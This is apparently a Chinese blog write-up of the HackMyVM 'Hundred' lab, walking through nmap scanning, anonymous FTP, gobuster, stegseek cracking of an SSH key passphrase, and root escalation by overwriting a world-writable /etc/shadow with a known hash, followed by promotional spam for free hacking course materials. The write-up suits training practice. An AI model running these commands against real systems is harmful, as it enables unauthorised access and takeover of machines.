网络安全必学渗透测试流程

这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解渗透测试的流程有很好的帮助。

靶场地址: https://hackmyvm.eu/machines/machine.php?vm=Hundred

靶场基本情况:

KALI靶机:192.168.1.3/24 主机:192.168.1.146/24 目标:普通用户flag和管理员flag

信息收集阶段:

nmap -sn 192.168.1.0/2

img

sudo nmap -v -T4 -p- -A -oN nmap.log 192.168.1.146

nmap -A 192.168.1.146

img

这里我们看到开启了21端口,22端口和80端口:

【一>所有资源关注我,私信回复“资料”获取<一】 1、网络安全学习路线 2、电子书籍(白帽子) 3、安全大厂内部视频 4、100份src文档 5、常见安全面试题 6、ctf大赛经典题目解析 7、全套工具包 8、应急响应笔记

漏洞利用阶段:

我们连接下21端口:

用户名和密码都是ftp,然后查看当前目录文件,可见密钥文件和users.txt文件。

其实用户名是ftp,密码是什么,都可以登录!

img

这里采用mget,将所有文件下载到本地!这里采用mget可以一次性下载多个文件!

img

id_rsa文件:私钥是个兔子!

img

公钥文件,看着挺正常!

img

接下来,查看下id_rsa.pem文件!这个像是私钥文件!

img

然后,查看用户名文件!最后那个感谢的像是真正的用户名!

img

可以这里我们试着用着这个私钥文件通过SSH登录下hmv这个文件!

嘿嘿嘿,不行!

img

这条路暂时不同,接着咱们看下那个开放的80端口,直接访问下看看!!!

一个方块?

img

img

貌似出题人,打靶场打的魔怔了!

查看源代码,发现了端倪!

img

上面是个文件,下面是个目录!?先下载下来看看

wget http://192.168.1.146/h4ckb1tu5.enc

这个页面作为一个整体告诉我们可以通过这个key值获取一个目录。而且,我们也可以从logo图片获取一些信息通过图片隐写术。回到这个key值,我们可以通过RSA私钥和OpenSSL rsautl解码信息。通过解码信息获取一个文件。

接下来,我们用私钥文件和下载下来不知道啥玩意的文件生成目录!

img

访问下看看!192.168.1.146/,方向没错!!!

img

查看源代码?啥也没有?

img

网站的目录扫描有要点,一层一层的扫描!!!

来个超级字典!

https://github.com/danielmiessler/SecLists/releases/tag/2022.1

扫一波目录:

gobuster dir -w /root/Web-Content/common.txt -u http://192.168.1.146/softyhackb4el7dshelldredd/

img

然后,把这个私钥下载下来:

wget http://192.168.1.146/softyhackb4el7dshelldredd/id_rsa

img

这次登录试下!两个问题:

  1. too open需要将私钥的权限改为600
  2. 这个id_rsa需要密码

img

接下来,需要搞定这个rsa的密码!!!!

我们先把这个logo图片下下来!!!

wget http://192.168.1.146/logo.jpg

这里我们需要安装一个图片隐写工具:

https://github.com/RickdeJager/stegseek/releases/tag/v0.6

下载完:安装下:

dpkg -i stegseek_0.6-1.deb

安装过程中可能缺少部分组件:

apt --fix-broken install

安装完毕:采用先前的user.txt,对logo图片进行解密!

stegseek logo.jpg users.txt -xf output

img

这就是私钥的密码了!!

d4t4s3c#1

ssh -i id_rsa hmv@192.168.1.146

img
终于进来了!!!!

权限提升阶段:

接下来,root权限提升:

在这台VM上root的权限提升很容易。这个/etc/shadow文件对任何人可写。因为我们可以通过修改这个文件来获取root的密码。

以下链接介绍了/etc/shadow文件的组成:

https://www.cyberciti.biz/faq/understanding-etcshadow-file/

图片上传失败

重试

因为我们不需要读/etc/shadow这个文件,我们只需要复写它。

因此,我们把密码修改为root,如下:

1 生成密码root的加密值

openssl passwd # enter new password “root”

2 将root的加密值导入到/etc/shadow的root用户格式中

echo root:qdbEWfKM1ov2g:18844:0:99999:7::: > /etc/shadow

3 切换为root,输入密码root

su -l

img

完事了,这个难度是easy,其实也不简单。

从靠劳力赚钱转变成靠脑力赚钱,想入门网络安全的小白肯定想知道如何学好?

👉[[[CSDN大礼包:《黑客&网络安全入门&进阶学习资源》免费分享]]]安全链接,放心点击

对于0基础小白入门:

如果你是零基础小白,想快速入门网络安全是可以考虑的。
一方面是学习时间相对较短,学习内容更全面更集中。
二方面是可以找到适合自己的学习方案

包括: 网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。 带你从零基础系统性的学好网络安全!

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。(全套教程文末领取哈)
在这里插入图片描述
加粗样式如图片过大被平台压缩导致看不清的话,想要这个详细学习路线图的话呢。

以及我整理的视频配套资料&国内外网安书籍、文档&工具等等

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
这份完整版的学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

👉[[[CSDN大礼包:《黑客&网络安全入门&进阶学习资源》免费分享]]]安全链接,放心点击